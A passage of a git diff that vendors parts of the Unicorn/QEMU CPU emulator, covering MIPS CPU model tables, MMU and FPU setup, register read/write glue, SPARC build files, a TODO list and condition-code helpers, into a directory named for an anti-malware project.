/ L / W but doesn't use the fcr0 bits. */ + (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_D) | (1 << FCR0_S) | + (0x82 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64 | ASE_MIPS3D, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS64 Release 2 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "MIPS64R2-generic", + 0x00010000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_LPA), + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 2, + 0x36FBFFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | + (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... + 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64R2 | ASE_MIPS3D, + MMU_TYPE_R4000, + }, + { + /* A generic CPU supporting MIPS64 Release 6 ISA. + FIXME: Support IEEE 754-2008 FP and misaligned memory accesses. + Eventually this should be replaced by a real CPU model. */ + "MIPS64R6-generic", + 0x00010000, + MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_RXI) | (1 << CP0C3_BP) | + (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1U << CP0C3_M), + MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | + (3 << CP0C4_IE) | (1 << CP0C4_M), + 0, + 0, + (1 << CP0C5_SBRI), + 0, + 0, + 0, + 0, + 32, + 2, + 0x30D8FFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | + (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... + 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, + (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | + (1U << CP0PG_RIE), + 0, + CPU_MIPS64R6, + MMU_TYPE_R4000, + }, + { + "Loongson-2E", + 0x6302, + /*64KB I-cache and d-cache. 4 way with 32 bit cache line size*/ + (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | + (0x1<<4) | (0x1<<1), + /* Note: Config1 is only used internally, Loongson-2E has only Config0. */ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 16, + 2, + 0x35D0FFFF, + 0, + 0, + (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), + 0, + 40, + 40, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_LOONGSON2E, + MMU_TYPE_R4000, + }, + { + "Loongson-2F", + 0x6303, + /*64KB I-cache and d-cache. 4 way with 32 bit cache line size*/ + (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | + (0x1<<4) | (0x1<<1), + /* Note: Config1 is only used internally, Loongson-2F has only Config0. */ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 16, + 2, + 0xF5D0FF1F, /*bit5:7 not writable*/ + 0, + 0, + (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), + 0, + 40, + 40, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_LOONGSON2F, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS64 ASE DSP 2 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "mips64dspr2", + 0x00010000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_DSP2P) | + (1 << CP0C3_DSPP) | (1 << CP0C3_LPA), + 0,0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 2, + 0x37FBFFFF, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | + (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | + (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + /* The architectural limit is 59, but we have hardcoded 36 bit + in some places... + 59, */ /* the architectural limit */ + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64R2 | ASE_DSP | ASE_DSPR2, + MMU_TYPE_R4000, + }, + +#endif +}; + +static const mips_def_t *cpu_mips_find_by_name (const char *name) +{ + int i; + + for (i = 0; i < ARRAY_SIZE(mips_defs); i++) { + if (strcasecmp(name, mips_defs[i].name) == 0) { + return &mips_defs[i]; + } + } + return NULL; +} + +void mips_cpu_list (FILE *f, fprintf_function cpu_fprintf) +{ + int i; + + for (i = 0; i < ARRAY_SIZE(mips_defs); i++) { + (*cpu_fprintf)(f, "MIPS '%s'\n", + mips_defs[i].name); + } +} + +#ifndef CONFIG_USER_ONLY +static void no_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1; + env->tlb->map_address = &no_mmu_map_address; +} + +static void fixed_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1; + env->tlb->map_address = &fixed_mmu_map_address; +} + +static void r4k_mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->tlb->nb_tlb = 1 + ((def->CP0_Config1 >> CP0C1_MMU) & 63); + env->tlb->map_address = &r4k_map_address; + env->tlb->helper_tlbwi = r4k_helper_tlbwi; + env->tlb->helper_tlbwr = r4k_helper_tlbwr; + env->tlb->helper_tlbp = r4k_helper_tlbp; + env->tlb->helper_tlbr = r4k_helper_tlbr; + env->tlb->helper_tlbinv = r4k_helper_tlbinv; + env->tlb->helper_tlbinvf = r4k_helper_tlbinvf; +} + +static void mmu_init (CPUMIPSState *env, const mips_def_t *def) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + env->tlb = g_malloc0(sizeof(CPUMIPSTLBContext)); + + switch (def->mmu_type) { + case MMU_TYPE_NONE: + no_mmu_init(env, def); + break; + case MMU_TYPE_R4000: + r4k_mmu_init(env, def); + break; + case MMU_TYPE_FMT: + fixed_mmu_init(env, def); + break; + case MMU_TYPE_R3000: + case MMU_TYPE_R6000: + case MMU_TYPE_R8000: + default: + cpu_abort(CPU(cpu), "MMU type not supported\n"); + } +} +#endif /* CONFIG_USER_ONLY */ + +static void fpu_init (CPUMIPSState *env, const mips_def_t *def) +{ + int i; + + for (i = 0; i < MIPS_FPU_MAX; i++) + env->fpus[i].fcr0 = def->CP1_fcr0; + + memcpy(&env->active_fpu, &env->fpus[0], sizeof(env->active_fpu)); +} + +static void mvp_init (CPUMIPSState *env, const mips_def_t *def) +{ + env->mvp = g_malloc0(sizeof(CPUMIPSMVPContext)); + + /* MVPConf1 implemented, TLB sharable, no gating storage support, + programmable cache partitioning implemented, number of allocatable + and sharable TLB entries, MVP has allocatable TCs, 2 VPEs + implemented, 5 TCs implemented. */ + env->mvp->CP0_MVPConf0 = (1U << CP0MVPC0_M) | (1 << CP0MVPC0_TLBS) | + (0 << CP0MVPC0_GS) | (1 << CP0MVPC0_PCP) | +// TODO: actually do 2 VPEs. +// (1 << CP0MVPC0_TCA) | (0x1 << CP0MVPC0_PVPE) | +// (0x04 << CP0MVPC0_PTC); + (1 << CP0MVPC0_TCA) | (0x0 << CP0MVPC0_PVPE) | + (0x00 << CP0MVPC0_PTC); +#if !defined(CONFIG_USER_ONLY) + /* Usermode has no TLB support */ + env->mvp->CP0_MVPConf0 |= (env->tlb->nb_tlb << CP0MVPC0_PTLBE); +#endif + + /* Allocatable CP1 have media extensions, allocatable CP1 have FP support, + no UDI implemented, no CP2 implemented, 1 CP1 implemented. */ + env->mvp->CP0_MVPConf1 = (1U << CP0MVPC1_CIM) | (1 << CP0MVPC1_CIF) | + (0x0 << CP0MVPC1_PCX) | (0x0 << CP0MVPC1_PCP2) | + (0x1 << CP0MVPC1_PCP1); +} + +static void msa_reset(CPUMIPSState *env) +{ +#ifdef CONFIG_USER_ONLY + /* MSA access enabled */ + env->CP0_Config5 |= 1 << CP0C5_MSAEn; + env->CP0_Status |= (1 << CP0St_CU1) | (1 << CP0St_FR); +#endif + + /* MSA CSR: + - non-signaling floating point exception mode off (NX bit is 0) + - Cause, Enables, and Flags are all 0 + - round to nearest / ties to even (RM bits are 0) */ + env->active_tc.msacsr = 0; + + /* tininess detected after rounding.*/ + set_float_detect_tininess(float_tininess_after_rounding, + &env->active_tc.msa_fp_status); + + /* clear float_status exception flags */ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); + + /* set float_status rounding mode */ + set_float_rounding_mode(float_round_nearest_even, + &env->active_tc.msa_fp_status); + + /* set float_status flush modes */ + set_flush_to_zero(0, &env->active_tc.msa_fp_status); + set_flush_inputs_to_zero(0, &env->active_tc.msa_fp_status); + + /* clear float_status nan mode */ + set_default_nan_mode(0, &env->active_tc.msa_fp_status); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c new file mode 100644 index 0000000..6723341 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.c @@ -0,0 +1,169 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/mips/mips.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + +#ifdef TARGET_MIPS64 +const int MIPS64_REGS_STORAGE_SIZE = offsetof(CPUMIPSState, tlb_table); +#else // MIPS32 +const int MIPS_REGS_STORAGE_SIZE = offsetof(CPUMIPSState, tlb_table); +#endif + +#ifdef TARGET_MIPS64 +typedef uint64_t mipsreg_t; +#else +typedef uint32_t mipsreg_t; +#endif + +static uint64_t mips_mem_redirect(uint64_t address) +{ + // kseg0 range masks off high address bit + if (address >= 0x80000000 && address <= 0x9fffffff) + return address & 0x7fffffff; + + // kseg1 range masks off top 3 address bits + if (address >= 0xa0000000 && address <= 0xbfffffff) { + return address & 0x1fffffff; + } + + // no redirect + return address; +} + +static void mips_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUMIPSState *)uc->current_cpu->env_ptr)->active_tc.PC = address; +} + + +void mips_release(void *ctx); +void mips_release(void *ctx) +{ + MIPSCPU* cpu; + int i; + TCGContext *tcg_ctx = (TCGContext *) ctx; + release_common(ctx); + cpu = MIPS_CPU(tcg_ctx->uc, tcg_ctx->uc->cpu); + g_free(cpu->env.tlb); + g_free(cpu->env.mvp); + + for (i = 0; i < MIPS_DSP_ACC; i++) { + g_free(tcg_ctx->cpu_HI[i]); + g_free(tcg_ctx->cpu_LO[i]); + } + + for (i = 0; i < 32; i++) { + g_free(tcg_ctx->cpu_gpr[i]); + } + + g_free(tcg_ctx->cpu_PC); + g_free(tcg_ctx->btarget); + g_free(tcg_ctx->bcond); + g_free(tcg_ctx->cpu_dspctrl); + + g_free(tcg_ctx->tb_ctx.tbs); +} + +void mips_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env; + (void)uc; + env = uc->cpu->env_ptr; + memset(env->active_tc.gpr, 0, sizeof(env->active_tc.gpr)); + + env->active_tc.PC = 0; +} + +int mips_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.active_tc.gpr[regid - UC_MIPS_REG_0]; + else { + switch(regid) { + default: break; + case UC_MIPS_REG_PC: + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.active_tc.PC; + break; + case UC_MIPS_REG_CP0_CONFIG3: + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.CP0_Config3; + break; + case UC_MIPS_REG_CP0_USERLOCAL: + *(mipsreg_t *)value = MIPS_CPU(uc, mycpu)->env.active_tc.CP0_UserLocal; + break; + } + } + } + + return 0; +} + +int mips_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) + MIPS_CPU(uc, mycpu)->env.active_tc.gpr[regid - UC_MIPS_REG_0] = *(mipsreg_t *)value; + else { + switch(regid) { + default: break; + case UC_MIPS_REG_PC: + MIPS_CPU(uc, mycpu)->env.active_tc.PC = *(mipsreg_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_MIPS_REG_CP0_CONFIG3: + MIPS_CPU(uc, mycpu)->env.CP0_Config3 = *(mipsreg_t *)value; + break; + case UC_MIPS_REG_CP0_USERLOCAL: + MIPS_CPU(uc, mycpu)->env.active_tc.CP0_UserLocal = *(mipsreg_t *)value; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +#ifdef TARGET_MIPS64 +#ifdef TARGET_WORDS_BIGENDIAN + void mips64_uc_init(struct uc_struct* uc) +#else + void mips64el_uc_init(struct uc_struct* uc) +#endif +#else // if TARGET_MIPS +#ifdef TARGET_WORDS_BIGENDIAN + void mips_uc_init(struct uc_struct* uc) +#else + void mipsel_uc_init(struct uc_struct* uc) +#endif +#endif +{ + register_accel_types(uc); + mips_cpu_register_types(uc); + mips_machine_init(uc); + uc->reg_read = mips_reg_read; + uc->reg_write = mips_reg_write; + uc->reg_reset = mips_reg_reset; + uc->release = mips_release; + uc->set_pc = mips_set_pc; + uc->mem_redirect = mips_mem_redirect; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h new file mode 100644 index 0000000..b1c6cac --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h @@ -0,0 +1,23 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_MIPS_H +#define UC_QEMU_TARGET_MIPS_H + +// functions to read & write registers +int mips_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int mips_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void mips_reg_reset(struct uc_struct *uc); + +void mips_uc_init(struct uc_struct* uc); +void mipsel_uc_init(struct uc_struct* uc); +void mips64_uc_init(struct uc_struct* uc); +void mips64el_uc_init(struct uc_struct* uc); + +extern const int MIPS_REGS_STORAGE_SIZE_mips; +extern const int MIPS_REGS_STORAGE_SIZE_mipsel; +extern const int MIPS64_REGS_STORAGE_SIZE_mips64; +extern const int MIPS64_REGS_STORAGE_SIZE_mips64el; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs new file mode 100644 index 0000000..a04ffad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs @@ -0,0 +1,7 @@ +obj-y += translate.o helper.o cpu.o +obj-y += fop_helper.o cc_helper.o win_helper.o mmu_helper.o ldst_helper.o +obj-$(TARGET_SPARC) += int32_helper.o +obj-$(TARGET_SPARC64) += int64_helper.o +obj-$(TARGET_SPARC64) += vis_helper.o +obj-$(TARGET_SPARC) += unicorn.o +obj-$(TARGET_SPARC64) += unicorn64.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO new file mode 100644 index 0000000..b8c727e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO @@ -0,0 +1,88 @@ +TODO-list: + +CPU common: +- Unimplemented features/bugs: + - Delay slot handling may fail sometimes (branch end of page, delay + slot next page) + - Atomical instructions + - CPU features should match real CPUs (also ASI selection) +- Optimizations/improvements: + - Condition code/branch handling like x86, also for FPU? + - Remove remaining explicit alignment checks + - Global register for regwptr, so that windowed registers can be + accessed directly + - Improve Sparc32plus addressing + - NPC/PC static optimisations (use JUMP_TB when possible)? (Is this + obsolete?) + - Synthetic instructions + - MMU model dependent on CPU model + - Select ASI helper at translation time (on V9 only if known) + - KQemu/KVM support for VM only + - Hardware breakpoint/watchpoint support + - Cache emulation mode + - Reverse-endian pages + - Faster FPU emulation + - Busy loop detection + +Sparc32 CPUs: +- Unimplemented features/bugs: + - Sun4/Sun4c MMUs + - Some V8 ASIs + +Sparc64 CPUs: +- Unimplemented features/bugs: + - Interrupt handling + - Secondary address space, other MMU functions + - Many V9/UA2005/UA2007 ASIs + - Rest of V9 instructions, missing VIS instructions + - IG/MG/AG vs. UA2007 globals + - Full hypervisor support + - SMP/CMT + - Sun4v CPUs + +Sun4: +- To be added + +Sun4c: +- A lot of unimplemented features +- Maybe split from Sun4m + +Sun4m: +- Unimplemented features/bugs: + - Hardware devices do not match real boards + - Floppy does not work + - CS4231: merge with cs4231a, add DMA + - Add cg6, bwtwo + - Arbitrary resolution support + - PCI for MicroSparc-IIe + - JavaStation machines + - SBus slot probing, FCode ROM support + - SMP probing support + - Interrupt routing does not match real HW + - SuSE 7.3 keyboard sometimes unresponsive + - Gentoo 2004.1 SMP does not work + - SS600MP ledma -> lebuffer + - Type 5 keyboard + - Less fixed hardware choices + - DBRI audio (Am7930) + - BPP parallel + - Diagnostic switch + - ESP PIO mode + +Sun4d: +- A lot of unimplemented features: + - SBI + - IO-unit +- Maybe split from Sun4m + +Sun4u: +- Unimplemented features/bugs: + - Interrupt controller + - PCI/IOMMU support (Simba, JIO, Tomatillo, Psycho, Schizo, Safari...) + - SMP + - Happy Meal Ethernet, flash, I2C, GPIO + - A lot of real machine types + +Sun4v: +- A lot of unimplemented features + - A lot of real machine types diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c new file mode 100644 index 0000000..69823b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c @@ -0,0 +1,492 @@ +/* + * Helpers for lazy condition code handling + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +static uint32_t compute_null(CPUSPARCState *env) +{ + return 0; +} + +static uint32_t compute_all_flags(CPUSPARCState *env) +{ + return env->psr & PSR_ICC; +} + +static uint32_t compute_C_flags(CPUSPARCState *env) +{ + return env->psr & PSR_CARRY; +} + +static inline uint32_t get_NZ_icc(int32_t dst) +{ + uint32_t ret = 0; + + if (dst == 0) { + ret = PSR_ZERO; + } else if (dst < 0) { + ret = PSR_NEG; + } + return ret; +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_flags_xcc(CPUSPARCState *env) +{ + return env->xcc & PSR_ICC; +} + +static uint32_t compute_C_flags_xcc(CPUSPARCState *env) +{ + return env->xcc & PSR_CARRY; +} + +static inline uint32_t get_NZ_xcc(target_long dst) +{ + uint32_t ret = 0; + + if (!dst) { + ret = PSR_ZERO; + } else if (dst < 0) { + ret = PSR_NEG; + } + return ret; +} +#endif + +static inline uint32_t get_V_div_icc(target_ulong src2) +{ + uint32_t ret = 0; + + if (src2 != 0) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_div(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_V_div_icc(CC_SRC2); + return ret; +} + +static uint32_t compute_C_div(CPUSPARCState *env) +{ + return 0; +} + +static inline uint32_t get_C_add_icc(uint32_t dst, uint32_t src1) +{ + uint32_t ret = 0; + + if (dst < src1) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_addx_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 & src2) | (~dst & (src1 | src2))) & (1U << 31)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_add_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1U << 31)) { + ret = PSR_OVF; + } + return ret; +} + +#ifdef TARGET_SPARC64 +static inline uint32_t get_C_add_xcc(target_ulong dst, target_ulong src1) +{ + uint32_t ret = 0; + + if (dst < src1) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_addx_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 & src2) | (~dst & (src1 | src2))) & (1ULL << 63)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_add_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1ULL << 63)) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_add_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_add_xcc(CC_DST, CC_SRC); + ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_add_xcc(CPUSPARCState *env) +{ + return get_C_add_xcc(CC_DST, CC_SRC); +} +#endif + +static uint32_t compute_all_add(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_add(CPUSPARCState *env) +{ + return get_C_add_icc(CC_DST, CC_SRC); +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_addx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_addx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} +#endif + +static uint32_t compute_all_addx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_addx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static inline uint32_t get_V_tag_icc(target_ulong src1, target_ulong src2) +{ + uint32_t ret = 0; + + if ((src1 | src2) & 0x3) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_tadd(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_tag_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_taddtv(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + return ret; +} + +static inline uint32_t get_C_sub_icc(uint32_t src1, uint32_t src2) +{ + uint32_t ret = 0; + + if (src1 < src2) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_subx_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((~src1 & src2) | (dst & (~src1 | src2))) & (1U << 31)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_sub_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2) & (src1 ^ dst)) & (1U << 31)) { + ret = PSR_OVF; + } + return ret; +} + + +#ifdef TARGET_SPARC64 +static inline uint32_t get_C_sub_xcc(target_ulong src1, target_ulong src2) +{ + uint32_t ret = 0; + + if (src1 < src2) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_subx_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((~src1 & src2) | (dst & (~src1 | src2))) & (1ULL << 63)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_sub_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2) & (src1 ^ dst)) & (1ULL << 63)) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_sub_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_sub_xcc(CC_SRC, CC_SRC2); + ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_sub_xcc(CPUSPARCState *env) +{ + return get_C_sub_xcc(CC_SRC, CC_SRC2); +} +#endif + +static uint32_t compute_all_sub(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_sub(CPUSPARCState *env) +{ + return get_C_sub_icc(CC_SRC, CC_SRC2); +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_subx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_subx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} +#endif + +static uint32_t compute_all_subx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_subx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_tsub(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_tag_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_tsubtv(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_logic(CPUSPARCState *env) +{ + return get_NZ_icc(CC_DST); +} + +static uint32_t compute_C_logic(CPUSPARCState *env) +{ + return 0; +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_logic_xcc(CPUSPARCState *env) +{ + return get_NZ_xcc(CC_DST); +} +#endif + +typedef struct CCTable { + uint32_t (*compute_all)(CPUSPARCState *env); /* return all the flags */ + 